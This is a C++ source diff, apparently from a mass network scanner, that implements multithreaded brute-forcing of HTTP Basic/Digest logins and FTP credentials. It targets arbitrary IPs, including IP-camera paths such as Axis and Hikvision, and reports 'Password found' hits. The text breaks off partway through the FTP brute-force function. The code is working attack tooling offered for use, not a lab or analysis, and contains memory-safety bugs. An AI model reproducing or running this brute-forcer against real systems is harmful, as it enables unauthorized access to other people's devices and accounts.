+#pragma comment(lib, "iphlpapi.lib")
+#endif
+int gMaxBrutingThreads = 200;
+fd_set write_fs;
+
+
+int _countFTPDirectories(char *recvBuff){
+ if(strcmp(recvBuff, "dummy\r\n") == 0) return 0;
+ int dirCounter = 0;
+ if(recvBuff[strlen(recvBuff) - 1] != '\n') strcat(recvBuff, "\n");
+ char *dirPtr = strstr(recvBuff, "\n");
+ while(dirPtr != NULL){
+ ++dirCounter;
+ dirPtr = strstr(dirPtr + 1, "\n");
+ };
+ return dirCounter;
+}
+
+void BConInc()
+{
+#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
+__asm
+ {
+ lock inc BrutingThrds;
+ };
+#else
+ asm("lock incl BrutingThrds");
+#endif
+
+ stt->doEmitionChangeBA(QString::number(BrutingThrds));
+}
+
+void BConDec()
+{
+ if(BrutingThrds > 0)
+ {
+#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
+ __asm
+ {
+ lock dec BrutingThrds;
+ };
+#else
+ asm("lock decl BrutingThrds");
+#endif
+ }
+
+ stt->doEmitionChangeBA(QString::number(BrutingThrds));
+
+}
+
+bool debugWriteWait = false;
+void _DebugWriteHTMLToFile(char *request, char *buff)
+{
+ while(debugWriteWait) Sleep(50);
+ debugWriteWait = true;
+ FILE *df = fopen("./debugData.txt", "a");
+
+ if(df != NULL)
+ {
+ fputs(request, df);
+ fputs("==========================\n", df);
+ fputs(buff, df);
+ fputs("\n==========================\n==========================\n\n", df);
+ fclose(df);
+ }
+ else
+ {
+ stt->doEmitionRedFoundData("[DEBUG] Cannot open debugData.txt");
+ };
+ debugWriteWait = false;
+}
+unsigned char tl(unsigned char d)
+{
+ if(d >= 192 && d <= 223)
+ {
+ unsigned char y = d + 32;
+ return y;
+ }
+ else
+ {
+ return tolower(d);
+ };
+};
+int recvWT(
+ int Socket,
+ char *Buffer,
+ int Len,
+ long Timeout,
+ int *bTimedOut
+ ){
+ fd_set ReadSet;
+ int n;
+ struct timeval Time;
+
+ FD_ZERO(&ReadSet);
+ FD_SET(Socket,&ReadSet);
+ Time.tv_sec = Timeout;
+ Time.tv_usec = 0;
+ *bTimedOut = false;
+ n = select(Socket+1,&ReadSet,NULL,NULL,&Time);
+ if (n > 0) { /* got some data */
+ return recv(Socket,Buffer,Len,0);
+ }
+ if (n == 0) { /* timeout */
+ *bTimedOut = true;
+ }
+ return(n) ; /* trouble */
+}
+std::string toLowerStr(const char *str)
+{
+ int tsz = strlen(str);
+ if(tsz == 1)
+ {
+ if(str[0] == 10) return "[No data!]";
+ else return str;
+ }
+ else if(tsz > 1)
+ {
+ char * strr = new char[tsz+1];
+ ZeroMemory(strr, tsz);
+
+ for (int i = 0; i < tsz; i++)
+ {
+ strr[i] = tl(str[i]);
+ };
+
+ memset(strr + tsz, '\0', 1);
+
+ std::string tstr = strr;
+ delete []strr;
+ return tstr;
+ };
+ return "";
+};
+int OpenConnection(SOCKET *sock, const char *hostname, int port)
+{
+ struct hostent *host;
+ struct sockaddr_in addr;
+ if(strlen(hostname) == 0)
+ {
+ return -1;
+ };
+ if(port < 0 || port > 65535)
+ {
+ return -1;
+ };
+
+ if ( (host = gethostbyname(hostname)) == NULL )
+ {
+ ++offlines;
+ if(gNegDebugMode) stt->doEmitionDebugFoundData("[" + QString(hostname) + ":" + QString::number(port) + "" + "] Rejecting in _connection: Bad IP.");
+ return -1;
+ };
+ *sock = socket(PF_INET, SOCK_STREAM, 0);
+ ZeroMemory(&addr, sizeof(addr));
+ addr.sin_family = AF_INET;
+ addr.sin_port = htons(port);
+ addr.sin_addr.s_addr = *(long*)(host->h_addr);
+ if ( connect(*sock, (struct sockaddr*)&addr, sizeof(addr)) == SOCKET_ERROR )
+ {
+ ++offlines;
+ CSSOCKET(*sock);
+ return -1;
+ };
+ return 0;
+}
+
+void _baSSLWorker(char *ip, char *request, char *rvBuff)
+{
+ const SSL_METHOD *method = SSLv3_client_method(); /* Create new client-method instance */
+ SSL_CTX *ctx = SSL_CTX_new(method); /* Create new context */
+
+ if(ctx != NULL)
+ {
+ SOCKET sock;
+ SSL_CTX_set_timeout(ctx, gTimeOut);
+ int result = OpenConnection(&sock, ip, 443);
+ if(result >= 0)
+ {
+ SSL *ssl = NULL;
+ ssl = SSL_new(ctx); /* create new SSL connection state */
+ if(ssl != NULL)
+ {
+ SSL_set_fd(ssl, sock); /* attach the socket descriptor */
+ if(SSL_connect(ssl))
+ {
+ SSL_write(ssl, request, strlen(request));
+ if(MapWidgetOpened) stt->doEmitionAddOutData(QString(ip), QString(request));
+
+ char tempBuff[128] = {0};
+ int x = 1;
+ int xx = 0;
+
+ ZeroMemory(rvBuff, sizeof(rvBuff));
+ while(xx < 512)
+ {
+ x = SSL_read(ssl, tempBuff, sizeof(tempBuff));
+ if(x <= 0) break;
+ Activity += x;
+ xx += x;
+ strncat(rvBuff, tempBuff, x);
+ ZeroMemory(tempBuff, sizeof(tempBuff));
+ };
+
+ if(MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(rvBuff));
+ if(HTMLDebugMode) _DebugWriteHTMLToFile(request, rvBuff);
+ };
+ SSL_shutdown(ssl);
+ SSL_free(ssl);
+ CSSOCKET(sock);
+ SSL_CTX_free(ctx); /* release context */
+ return;
+ };
+ };
+ CSSOCKET(sock);
+ SSL_CTX_free(ctx); /* release context */
+ }
+ else
+ {
+ char buff1[512] = {0};
+ char buff2[512] = {0};
+
+ ERR_error_string(ERR_peek_error(), buff1);
+ ERR_error_string(ERR_peek_last_error(), buff2);
+ stt->doEmitionRedFoundData(QString(ip) + " SSL(InitCTX) 1:" + QString(buff1) + " 2:" + QString(buff2));
+ };
+};
+char *_getAttributeValue(char *str, char *val, char *ip, int port)
+{
+ char res[1024] = {0};
+ char *ptrStart = NULL;
+ char *ptrS1End = NULL;
+ char *ptrS2End = NULL;
+
+ ptrStart = strstri(str, val);
+ if(ptrStart != NULL)
+ {
+ if(strstri(ptrStart, "qop=auth") != NULL) return "auth";
+ ptrS1End = _findFirst(ptrStart, "\"");
+ if(ptrS1End != NULL)
+ {
+ ptrS2End = _findFirst(ptrS1End + 1, "\"");
+ if(ptrS2End != NULL)
+ {
+ int sz = ptrS2End - ptrS1End - 1;
+
+ if(sz != 0 && sz < 1024) strncpy(res, ptrS1End + 1, sz);
+ else return "";
+
+ return res;
+ }
+ else
+ {
+ stt->doEmitionRedFoundData("[_getAttributeValue] Error retrieving value: \"" + QString(val) + "\" IP:" + QString(ip) + ":" + QString::number(port) + "");
+ return "";
+ };
+ }
+ else
+ {
+ stt->doEmitionRedFoundData("[_getAttributeValue] Error retrieving value: \"" + QString(val) + "\" IP:" + QString(ip) + ":" + QString::number(port) + "");
+ return "";
+ };
+ }
+ else
+ {
+ stt->doEmitionRedFoundData("[_getAttributeValue] Error retrieving value: \"" + QString(val) + "\" IP:" + QString(ip) + ":" + QString::number(port) + "");
+ return "";
+ };
+};
+
+#define HASHLEN 16
+typedef char HASH[HASHLEN];
+#define HASHHEXLEN 32
+typedef char HASHHEX[HASHHEXLEN+1];
+#define IN
+#define OUT
+void CvtHex(
+ IN HASH Bin,
+ OUT HASHHEX Hex
+ )
+{
+ unsigned short i;
+ unsigned char j;
+
+ for (i = 0; i < HASHLEN; i++) {
+ j = (Bin[i] >> 4) & 0xf;
+ if (j <= 9)
+ Hex[i*2] = (j + '0');
+ else
+ Hex[i*2] = (j + 'a' - 10);
+ j = Bin[i] & 0xf;
+ if (j <= 9)
+ Hex[i*2+1] = (j + '0');
+ else
+ Hex[i*2+1] = (j + 'a' - 10);
+ };
+ Hex[HASHHEXLEN] = '\0';
+};
+char *_makeDigestResponse(
+ char *login,
+ char *realm,
+ char *pass,
+ char *path,
+ char *nonce,
+ char *pszNonceCount,
+ char *pszCNonce,
+ char *pszQop
+ )
+{
+ char HA1[MD5_DIGEST_LENGTH];
+ char HA2[MD5_DIGEST_LENGTH];
+ char HA1Data[512] = {0};
+ char HA2Data[512] = {0};
+
+ strcpy(HA1Data, login);
+ strcat(HA1Data, ":");
+ strcat(HA1Data, realm);
+ strcat(HA1Data, ":");
+ strcat(HA1Data, pass);
+
+ strcpy(HA2Data, "GET:");
+ strcat(HA2Data, path);
+
+ MD5((unsigned char*) HA1Data, strlen(HA1Data), (unsigned char*)HA1);
+ MD5((unsigned char*) HA2Data, strlen(HA2Data), (unsigned char*)HA2);
+
+ char responseData[512] = {0};
+ char *HA1MD5 = new char[64];
+ char *HA2MD5 = new char[64];
+ ZeroMemory(HA1MD5, 64);
+ ZeroMemory(HA2MD5, 64);
+
+ CvtHex(HA1, HA1MD5);
+ strcpy(responseData, HA1MD5);
+ strcat(responseData, ":");
+ strcat(responseData, nonce);
+ strcat(responseData, ":");
+ if (*pszQop != NULL) {
+ strcat(responseData, pszNonceCount);
+ strcat(responseData, ":");
+ strcat(responseData, pszCNonce);
+ strcat(responseData, ":");
+ strcat(responseData, pszQop);
+ strcat(responseData, ":");
+ };
+ CvtHex(HA2, HA2MD5);
+ strcat(responseData, HA2MD5);
+ delete []HA1MD5;
+ delete []HA2MD5;
+
+ char response[MD5_DIGEST_LENGTH];
+ MD5((unsigned char*) responseData, strlen(responseData), (unsigned char*)response);
+ char responseMD5[64] = {0};
+ CvtHex(response, responseMD5);
+ return (char*)responseMD5;
+};
+
+lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method)
+{
+ if(strcmp(method, "[DIGEST]") != 0 && strcmp(method, "[NORMAL]") != 0) stt->doEmitionRedFoundData("[-] Unknown method IP: " + QString(ip) + ":" + QString::number(port) + + "");
+ lopaStr lps;
+ ZeroMemory(lps.login, sizeof(lps.login));
+ ZeroMemory(lps.pass, sizeof(lps.pass));
+ ZeroMemory(lps.other, sizeof(lps.other));
+
+ int cookieLen = strlen(cookie);
+ char path[512] = {0};
+ strncpy(path, pathT, 512);
+
+ int bTO;
+ bool goon = false;
+ char hRqst[REQUEST_MAX_SIZE] = {0};
+ char headerMsg[REQUEST_MAX_SIZE] = {0};
+ char hMsgR[512] = {0};
+
+ strcpy(hRqst, "GET ");
+ strcat(hRqst, path);
+ strcat(hRqst, " HTTP/1.1\r\nHost: ");
+ strcat(hRqst, ip);
+
+ if(port != 80){
+ strcat(hRqst, ":");
+ char tbuff[16] = {0};
+ sprintf(tbuff, "%d", port);
+ strcat(hRqst, tbuff);
+ };
+
+ if(cookieLen != 0)
+ {
+ strcat(hRqst, "\r\nCookie: ");
+ strcat(hRqst, cookie);
+ };
+ strcat(hRqst, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nAuthorization: Basic bG9sa2E6bG9sa2F=\r\n\r\n");
+
+ sockaddr_in sockAddr;
+ if(port == 443)
+ {
+ ZeroMemory(headerMsg, REQUEST_MAX_SIZE);
+ _baSSLWorker(ip, hRqst, headerMsg);
+ }
+
+ else
+ {
+ SOCKET sock;
+ sockAddr.sin_family = AF_INET;
+ sockAddr.sin_port = htons(port);
+ HOSTENT *host;
+#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
+ if(inet_addr(ip) != INADDR_NONE) sockAddr.sin_addr.S_un.S_addr = inet_addr(ip);
+ else if(host=gethostbyname (ip)) ((unsigned long*) &sockAddr.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0];
+ else
+ {
+ isActive = 0;
+ strcpy(lps.login, "UNKNOWN");
+ return lps;
+ };
+#else
+ if(inet_addr(ip) != INADDR_NONE) sockAddr.sin_addr.s_addr = inet_addr(ip);
+ else if(host=gethostbyname (ip)) ((unsigned long*) &sockAddr.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0];
+ else
+ {
+ isActive = 0;
+ strcpy(lps.login, "UNKNOWN");
+ return lps;
+ };
+#endif
+ sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
+ if(sock != INVALID_SOCKET) {
+
+ if(connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr)) != SOCKET_ERROR) {
+
+ if(send(sock, hRqst, strlen(hRqst), 0) != SOCKET_ERROR) {
+
+ if(MapWidgetOpened) stt->doEmitionAddOutData(QString(ip), QString(hRqst));
+ ZeroMemory(headerMsg, REQUEST_MAX_SIZE);
+ int x = 1;
+ int xx = 0;
+
+ while(xx < 512)
+ {
+ x = recvWT(sock, hMsgR, sizeof(hMsgR), gTimeOut + 5, &bTO);
+ if(x <= 0) break;
+ strncat(headerMsg, hMsgR, x);
+ xx += x;
+ ZeroMemory(hMsgR, sizeof(hMsgR));
+ };
+
+ if(MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(headerMsg));
+ } else {
+ if(gDebugMode) stt->doEmitionDebugFoundData("[BA::Send]: " + QString::number(WSAGetLastError()));
+ };
+ } else {
+ if(gDebugMode) stt->doEmitionDebugFoundData("[BA::Connect]: " + QString::number(WSAGetLastError()));
+ };
+ } else {
+ if(gDebugMode) stt->doEmitionDebugFoundData("[BA: Invalid socket]: " + QString::number(WSAGetLastError()));
+ };
+ CSSOCKET(sock);
+ };
+
+
+
+ if(strlen(headerMsg) == 0)
+ {
+ isActive = 0;
+
+ strcpy(lps.login, "UNKNOWN");
+ return lps;
+ };
+
+ if(strstr(headerMsg, "401 ") == NULL
+ && strstr(headerMsg, ".1 401") == NULL
+ && strstr(headerMsg, ".0 401") == NULL
+ && strstr(headerMsg, "401") == NULL
+ && strstr(headerMsg, "Unauthorized") == NULL
+ )
+ {
+ if(strstri(headerMsg, "400 Bad") != NULL)
+ {
+ strcpy(lps.other, "[400 Bad Request]");
+ isActive = 0;
+ return lps;
+ }
+ else if(strstri(headerMsg, "404 Not") != NULL
+ || strstr(headerMsg, "404 ") != NULL
+ || strstr(headerMsg, ".1 404") != NULL
+ || strstr(headerMsg, ".0 404") != NULL
+ )
+ {
+ if(strstr(path, "/axis-cgi/com/ptz.cgi?") != NULL)
+ {
+ int sz = strlen("/view/viewer_index.shtml");
+ strncpy(path, "/view/viewer_index.shtml", sz);
+ memset(path + sz, 0, 1);
+ goon = true;
+ }
+ else
+ {
+ strcpy(lps.other, QString("[404 Not Found (" + QString(path) + ")]").toLocal8Bit().data());
+ isActive = 0;
+ return lps;
+ };
+ }
+ else if( //
+ (strstr(headerMsg, ".1 403") != NULL //
+ || strstr(headerMsg, ".0 403") != NULL //Hikkvision2
+ ) //
+ && strstr(headerMsg, "badAuthorization") != NULL //
+ )
+ {
+ goon = true;
+ }
+ else if(strlen(headerMsg) < 16)
+ {
+ goon = true;
+ stt->doEmitionRedFoundData("Corrupted reply: (" + QString(headerMsg) + ") " + QString(ip) + ":"+ QString::number(port));
+ };
+
+ if(goon == false)
+ {
+ strcpy(lps.login, "NULL");
+ strcpy(lps.pass, "NULL");
+ isActive = 0;
+ return lps;
+ };
+ };
+
+
+ isActive = 1;
+ char tPass[256] = {0};
+ char curLogin[256] = {0};
+ char curPass[256] = {0};
+ int cCode;
+ int cErrCode;
+ int dataSz = 0;
+ char request[REQUEST_MAX_SIZE] = {0};
+ char recvBuff[4096] = {0};
+ char recvBuff2[512] = {0};
+ char pass[256] = {0};
+ int WSAErr;
+
+ char localBuff[4096] = {0};
+ strcpy(localBuff, headerMsg);
+ int passCounter = 1;
+ char attribute[2048] = {0};
+ char nonce[512] = {0};
+ char realm[512] = {0};
+ char opaque[512] = {0};
+ char qop[64] = {0};
+ std::string encoded = "";
+
+ for(int i = 0; i < MaxLogin; i++)
+ {
+ if(globalScanFlag == false) break;
+ for(int j = 0; j < MaxPass; j++)
+ {
+ if(globalScanFlag == false) break;
+
+ ZeroMemory(request, REQUEST_MAX_SIZE);
+ ZeroMemory(curLogin, sizeof(curLogin));
+ ZeroMemory(curPass, sizeof(curPass));
+ strcpy(curLogin, loginLst[i]);
+ strcpy(curPass, passLst[j]);
+
+ if(strcmp(method, "[DIGEST]") == 0 && strstr(localBuff, "nonce=") != NULL)
+ {
+ ZeroMemory(attribute, sizeof(attribute));
+ strcpy(attribute, _getAttribute(localBuff, "WWW-Authenticate:"));
+ ZeroMemory(nonce, sizeof(nonce));
+ strcpy(nonce, _getAttributeValue(attribute, "nonce=", ip, port));
+ ZeroMemory(realm, sizeof(realm));
+ strcpy(realm, _getAttributeValue(attribute, "realm=", ip, port));
+ ZeroMemory(qop, sizeof(qop));
+ if(strstri(attribute, "qop") != NULL)
+ {
+ strcpy(qop, _getAttributeValue(attribute, "qop=", ip, port));
+ };
+
+ strcpy(request, "GET ");
+ strcat(request, path);
+ strcat(request, " HTTP/1.1\r\nHost: ");
+ strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ sprintf(tbuff, "%d", port);
+ strcat(request, tbuff);
+ };
+ if(cookieLen != 0)
+ {
+ strcat(request, "\r\nCookie: ");
+ strcat(request, cookie);
+ };
+
+ strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nAuthorization: Digest username=\"");
+ strcat(request, curLogin);
+ strcat(request, "\", realm=\"");
+ strcat(request, realm);
+ strcat(request, "\", nonce=\"");
+ strcat(request, nonce);
+ strcat(request, "\", uri=\"");
+ strcat(request, path);
+ strcat(request, "\", qop=auth, response=\"");
+ strcat(request, _makeDigestResponse(curLogin, realm, curPass, path, nonce, "10000001", "9d531d56796e0dc9", qop));
+ if(strstri(attribute, "opaque") != NULL)
+ {
+ ZeroMemory(opaque, sizeof(opaque));
+ strcpy(opaque, _getAttributeValue(attribute, "opaque=", ip, port));
+ strcat(request, "\", opaque=\"");
+ strcat(request, opaque);
+ };
+ strcat(request, "\", nc=10000001, cnonce=\"9d531d56796e0dc9\"");
+ strcat(request, "\r\nConnection: close\r\n\r\n");
+ }
+ else
+ {
+ ZeroMemory(tPass, sizeof(tPass));
+ strncpy(tPass, curLogin, strlen(curLogin));
+ strcat(tPass, ":");
+ strncat(tPass, curPass, strlen(curPass));
+ encoded = base64_encode((const unsigned char *)tPass, strlen(tPass));
+ strcpy(request, "GET ");
+ strcat(request, path);
+ strcat(request, " HTTP/1.1\r\nHost: ");
+ strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ sprintf(tbuff, "%d", port);
+ strcat(request, tbuff);
+ };
+ if(cookieLen != 0)
+ {
+ strcat(request, "\r\nCookie: ");
+ strcat(request, cookie);
+ };
+
+ strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nAuthorization: Basic ");
+ strcat(request, encoded.c_str());
+ strcat(request, "\r\nConnection: close\r\n\r\n");
+ };
+
+ if(port == 443)
+ {
+ ZeroMemory(recvBuff, sizeof(recvBuff));
+ if(BALogSwitched) stt->doEmitionBAData("Probing SSL:BA " + QString(ip) + ":" + QString::number(port) + "; login/pass: "+ QString(tPass) + ";");
+ _baSSLWorker(ip, request, recvBuff);
+ dataSz = strlen(recvBuff);
+ }
+
+ else
+ {
+ SOCKET sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
+ cCode = connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr));
+
+ if(cCode == SOCKET_ERROR) {
+
+ int errorCode = WSAGetLastError();
+ if(errorCode == 10038) {
+
+ while(errorCode == 10038)
+ {
+ if(gDebugMode) stt->doEmitionDebugFoundData("[BA][10038] - [" + QString(ip) + ":" + QString::number(port) + "]");
+ CSSOCKET(sock);
+ sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
+ cCode = connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr));
+ errorCode = WSAGetLastError();
+ };
+ } else {
+
+ CSSOCKET(sock);
+
+ if(errorCode != 10060)
+ {
+ stt->doEmitionRedFoundData("[BA] Cannot connect to " + QString(ip) + "[" + QString::number(errorCode) + "]");
+ };
+
+ isActive = 0;
+ strcpy(lps.login, "UNKNOWN");
+ return lps;
+ };
+ } else {
+
+ int x = 1;
+ Activity += strlen(request);
+
+ if(send(sock, request, strlen(request), 0) != SOCKET_ERROR)
+ {
+ if(MapWidgetOpened) stt->doEmitionAddOutData(QString(ip), QString(request));
+ dataSz = 0;
+ ZeroMemory(recvBuff2, sizeof(recvBuff2));
+ ZeroMemory(recvBuff, sizeof(recvBuff));
+ while (x > 0 && dataSz < 3384)
+ {
+ ZeroMemory(recvBuff2, sizeof(recvBuff2));
+ x = recvWT(sock, recvBuff2, sizeof(recvBuff2), gTimeOut + 5, &bTO);
+
+ dataSz += x;
+ Activity += x;
+ strncat(recvBuff, recvBuff2, x);
+ };
+ if(BALogSwitched) stt->doEmitionBAData("Checked BA: " + QString(ip) + ":" + QString::number(port) + "; login/pass: " + QString(curLogin) + ":" + QString(curPass) + "; - Progress: (" + QString::number((passCounter/(double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%)");
+ }
+ else
+ {
+ stt->doEmitionRedFoundData("[BA] Send error! [" + QString(ip) + "]");
+
+ CSSOCKET(sock);
+ isActive = 0;
+ strcpy(lps.login, "UNKNOWN");
+ return lps;
+ }
+ };
+ CSSOCKET(sock);
+ };
+
+
+ if(MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(recvBuff));
+
+ if(dataSz == 0)
+ {
+ stt->doEmitionBAData("[BA] No reply from: " + QString(ip) + "; Repeating...");
+ --j;
+ continue;
+ }
+ else
+ {
+ ++passCounter;
+ };
+
+ if(strcmp(method, "[DIGEST]") == 0)
+ {
+ ZeroMemory(localBuff, sizeof(localBuff));
+ strcpy(localBuff, recvBuff);
+ };
+
+ if(strstri(recvBuff, "http/1.1 401") == NULL
+ || strstri(recvBuff, "http/1.0 401") == NULL
+ )
+ {
+ ///dummy///
+ }
+ else if(strstri(recvBuff, "503 service unavailable") != NULL
+ || strstri(recvBuff, "http/1.1 503") != NULL
+ || strstri(recvBuff, "http/1.0 503") != NULL
+ || strstr(recvBuff, "400 BAD_REQUEST") != NULL
+ || strstri(recvBuff, "400 bad request") != NULL
+ || strstr(recvBuff, "403 Forbidden") != NULL
+ )
+ {
+ stt->doEmition_BARedData("[.] 503/400/403 - Waiting 30sec (" + QString(ip) + ":" + QString::number(port) + ")");
+
+ if(j > 0) --j;
+ Sleep(30000);
+ }
+ else if((strstri(recvBuff, "http/1.1 404") != NULL
+ || strstri(recvBuff, "http/1.0 404") != NULL
+ )
+ && strstri(recvBuff, "Authorization required") == NULL
+ )
+ {
+ if(HTMLDebugMode) _DebugWriteHTMLToFile(request, recvBuff);
+
+ stt->doEmitionRedFoundData("[-] 404 - Wrong path detected. (" + QString(ip) + ":" + QString::number(port) + QString(path) + ")");
+
+ isActive = 0;
+ strcpy(lps.login, "UNKNOWN");
+ return lps;
+ }
+ else if( (strstri(recvBuff, "200 ok") != NULL
+ || strstri(recvBuff, "http/1.0 200") != NULL
+ )
+ && strstri(recvBuff, "http/1.1 401 ") == NULL
+ && strstri(recvBuff, "http/1.0 401 ") == NULL
+ && strstr(headerMsg, "401") == NULL
+ && strstr(headerMsg, "Unauthorized") == NULL
+ && dataSz > 13
+ )
+ {
+ if(strstri(recvBuff, "access is denied") == NULL
+ && strstri(recvBuff, "iisstart") == NULL
+ && strstri(recvBuff, "Location:") == NULL
+ && strstri(recvBuff, "access forbidden") == NULL
+ )
+ {
+ ZeroMemory(pass, sizeof(pass));
+ strcpy(pass, ip);
+ strcat(pass, " - Password found: ");
+ strcat(pass, tPass);
+ isActive = 0;
+ stt->doEmition_BAGreenData("[+] " + QString(pass));
+ strcpy(lps.login, curLogin);
+ strcpy(lps.pass, curPass);
+ return lps;
+ };
+ }
+ else
+ {
+ ZeroMemory(pass, sizeof(pass));
+ strcpy(pass, ip);
+ strcat(pass, " - Password found: ");
+ strcat(pass, tPass);
+ isActive = 0;
+ char *pt1 = strstr(recvBuff, " ");
+ if(pt1 != NULL)
+ {
+ char *pt2 = strstr(pt1 + 1, " ");
+ if(pt2 != NULL)
+ {
+ int sz = pt2 - pt1 - 1;
+ char tempHeaderCode[16] = {0};
+ strncpy(tempHeaderCode, pt1 + 1, sz);
+
+ if(strcmp(tempHeaderCode, "302") == 0 && strcmp(tempHeaderCode, "200") == 0) stt->doEmitionYellowFoundData("[+] No/unexpected HTTP header detected (" + QString(tempHeaderCode) + ") IP: " + QString(ip) + ":" + QString::number(port) + "");
+ strcpy(lps.login, curLogin);
+ strcpy(lps.pass, curPass);
+ return lps;
+ };
+ };
+ stt->doEmitionYellowFoundData("[+] No/unexpected HTTP header detected (?) IP: " + QString(ip) + ":" + QString::number(port) + "");
+ strcpy(lps.login, curLogin);
+ strcpy(lps.pass, curPass);
+ return lps;
+ };
+ if(strstr(recvBuff, "Set-Cookie:") != NULL)
+ {
+ ZeroMemory(cookie, COOKIE_MAX_SIZE);
+ strncpy(cookie, _getAttribute(recvBuff, "Set-Cookie:"), COOKIE_MAX_SIZE);
+ cookieLen = strlen(cookie);
+ };
+ };
+ };
+
+ isActive = 0;
+
+ strcpy(lps.login, "UNKNOWN");
+ return lps;
+}
+lopaStr Connector::_BALobby(char *cookie, char *ip, int port, char *path, char *method, char *data = NULL)
+{
+ while(BrutingThrds >= gMaxBrutingThreads) Sleep(700);
+
+ BConInc();
+ lopaStr res = _BABrute(cookie, ip, port, path, method);
+ BConDec();
+
+ return res;
+};
+
+lopaStr _FTPBrute(char *ip, int port, PathStr *ps)
+{
+ lopaStr lps;
+ ZeroMemory(lps.login, sizeof(lps.login));
+ ZeroMemory(lps.pass, sizeof(lps.pass));
+ ZeroMemory(lps.other, sizeof(lps.other));
+
+ char recvBuff[1024] = {0}, request[64] = {0};
+ sockaddr_in sockAddr;
+ sockAddr.sin_family = AF_INET;
+ sockAddr.sin_port = htons(port);
+ HOSTENT *host;
+
+#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
+ if(inet_addr(ip) != INADDR_NONE) sockAddr.sin_addr.S_un.S_addr = inet_addr(ip);
+ else if(host=gethostbyname (ip)) ((unsigned long*) &sockAddr.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0];
+ else
+ {
+ strcpy(lps.login, "UNKNOWN");
+ return lps;
+ };
+#else
+ if(inet_addr(ip) != INADDR_NONE) sockAddr.sin_addr.s_addr = inet_addr(ip);
+ else if(host=gethostbyname (ip)) ((unsigned long*) &sockAddr.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0];
+ else
+ {
+ strcpy(lps.login, "UNKNOWN");
+ return lps;
+ };
+#endif
+
+ bool breakPassLoop = 0;
+ int passCounter = 1;
+ int bTO;
+ int x = 0;
+ int connectionResult, closedSocket = 1, loginFailedFlag = 0;
+
+ SOCKET sockFTP;
+ for(int i = 0; i < MaxLogin; ++i)
+ {
+ if(globalScanFlag == false) break;
+ if(strlen(loginLst[i]) <= 1) continue;
+
+ for(int j = 0; j < MaxPass; ++j)
+ {
+ if(globalScanFlag == false) break;
+ if(strlen(passLst[j]) <= 1) continue;
+
+ if(closedSocket)
+ {
+ closedSocket = 0;
+ sockFTP = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
+ connectionResult = connect(sockFTP, (sockaddr*)&sockAddr, sizeof(sockAddr));
+
+ while(WSAGetLastError() == 10038)
+ {
+ if(gDebugMode) stt->doEmitionDebugFoundData("[FTP] 10038 occured - [" + QString(ip) + ":" + QString::number(port) + "]");
+ CSSOCKET(sockFTP);
+ sockFTP = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
+ connectionResult = connect(sockFTP, (sockaddr*)&sockAddr, sizeof(sockAddr));
+ };
+ loginFailedFlag = 0;
+ };
+
+ isActive = 1;
+
+ if(connectionResult != SOCKET_ERROR)
+ {
+ x = 0;
+ while (true)
+ {
+ Sleep(100);
+ ZeroMemory(recvBuff, 1024);
+ x = recvWT(sockFTP, recvBuff, 1024, gTimeOut + 5, &bTO);
+ if(x <= 0) break;
+ if(MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(recvBuff));
+
+ Activity += x;
+ closedSocket = 0;
+ if(strstr(recvBuff, "451 The parameter is incorrect") != NULL)
+ {
+ CSSOCKET(sockFTP);
+ isActive = 0;
+ stt->doEmition_BARedData("[*] Unknown protocol (451 Error) - " + QString(ip));
+ strcpy(lps.other, "Unknown protocol (451 Error)");
+ return lps;
+ };
+
+ if(strstri(recvBuff, "only anonymous") != NULL)
+ {
+ CSSOCKET(sockFTP);
+ isActive = 0;
+ stt->doEmition_BAGreenData("[*] Anonymous access detected - " + QString(ip));
+
+ strcpy(lps.login, "anonymous");
